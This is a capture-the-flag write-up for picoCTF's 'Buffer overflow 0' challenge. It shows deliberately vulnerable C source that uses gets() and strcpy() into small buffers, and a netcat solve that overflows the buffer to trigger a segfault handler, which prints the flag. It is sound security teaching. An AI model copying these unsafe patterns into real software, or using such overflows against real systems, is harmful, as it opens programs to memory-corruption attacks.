Buffer overflow 0

Solver: e enscribe
Authors: Alex Fulton, Palash Oswal
Category: pwn
Points: 100
Files: vuln vuln.c
Remote: $ nc saturn.picoctf.net [PORT]
Flag: picoCTF{ov3rfl0ws_ar3nt_that_bad_[REDACTED]}

Smash the stack! Let’s start off simple: can you overflow the correct buffer?

For each of the following challenges, I’ll add the output of the checksec command, which shows the security settings of the binary:

$ checksec vuln
[*] '/home/kali/ctfs/pico22/buffer-overflow-0/vuln'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

Let’s now check out our source code:

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <string.h>
4
#include <signal.h>
5

6
#define FLAGSIZE_MAX 64
7

8
char flag[FLAGSIZE_MAX];
9

10
void sigsegv_handler(int sig) {
11
    printf("%s\n", flag);
12
    fflush(stdout);
13
    exit(1);
14
}
15

16
void vuln(char *input){
17
    char buf2[16];
18
    strcpy(buf2, input);
19
}
20

21
int main(int argc, char **argv){
22

23
    FILE *f = fopen("flag.txt","r");
24
    if (f == NULL) {
25
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
26
                        "own debugging flag.\n");
27
        exit(0);
28
    }
29

30
    fgets(flag,FLAGSIZE_MAX,f);
31
    signal(SIGSEGV, sigsegv_handler); // Set up signal handler
32

33
    gid_t gid = getegid();
34
    setresgid(gid, gid, gid);
35

36

37
    printf("Input: ");
38
    fflush(stdout);
39
    char buf1[100];
40
    gets(buf1);
41
    vuln(buf1);
42
    printf("The program will exit now\n");
43
    return 0;
44
}

The first thing we should do is check how the flag is printed. Looks like it’s handled in a sigsegv_handler() function:

10
void sigsegv_handler(int sig) {
11
    printf("%s\n", flag);
12
    fflush(stdout);
13
    exit(1);
14
}

Researching online, a “SIGSEGV” stands for a segmentation fault, which is an error raised by memory-protected hardware whenever it tries to access a memory address that is either restricted or does not exist. If the flag printf() resides within sigsegv_handler(), then we can safely assume that we must figure out how to trigger a segmentation fault.

We see that on line 40, the horrible gets() is called, and reads buf1 (the user input) onto the stack. This function sucks, as it will write the user’s input to the stack without regard to its allocated length. The user can simply overflow this length, and the program will pass their input into the vuln() function to trigger a segmentation fault:

$ nc saturn.picoctf.net 65535
Input: aaaaaaaaaaaaaaaaaaaaaaaaaaa
picoCTF{ov3rfl0ws_ar3nt_that_bad_[REDACTED]}